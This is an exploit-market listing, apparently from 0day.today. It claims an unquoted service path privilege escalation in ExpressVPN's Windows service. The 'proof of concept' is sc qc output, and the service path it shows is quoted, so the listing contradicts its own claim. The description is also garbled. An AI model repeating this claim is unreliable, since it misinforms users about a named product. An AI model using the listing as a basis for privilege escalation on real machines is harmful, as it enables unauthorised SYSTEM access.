[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ExpressVPN Unquoted Service Path Privilege Escalation Vulnerability

Author
Und3rgr0und
Risk
[
Security Risk High
]
0day-ID
0day-ID-32984
Category
local exploits
Date add
15-07-2019
Platform
windows
********************************************************
 # Exploit Title : ExpressVPN - Unquoted Service Path Privilege Escalation
 # Vendor Homepage : www.expressvpn.com 
 # Exploit Author: Iran Cyber Security Group 
 # Date : 2019-07-14 
 # Tested on : Win10  
 # Discovered By : Und3rgr0und 
 # Our Team : www.iran-cyber.net 
 ******************************************************* 
 
 # Description :
 
An older access system gives users access to up levels access. ExpressVPN 
installs a service ("ExpressVPNService") with an unquoted service path running with SYSTEM privileges.
This allows any non-privileged local user to execute arbitrary code with SYSTEM privileges.
 
 # POC :
 
 C:\xpl\Und3rgr0und>sc qc ExpressVPNService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ExpressVPNService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\ExpressVPN\bootstrap\amd64\nssm.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ExpressVPN Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


#  0day.today [2024-11-15]  #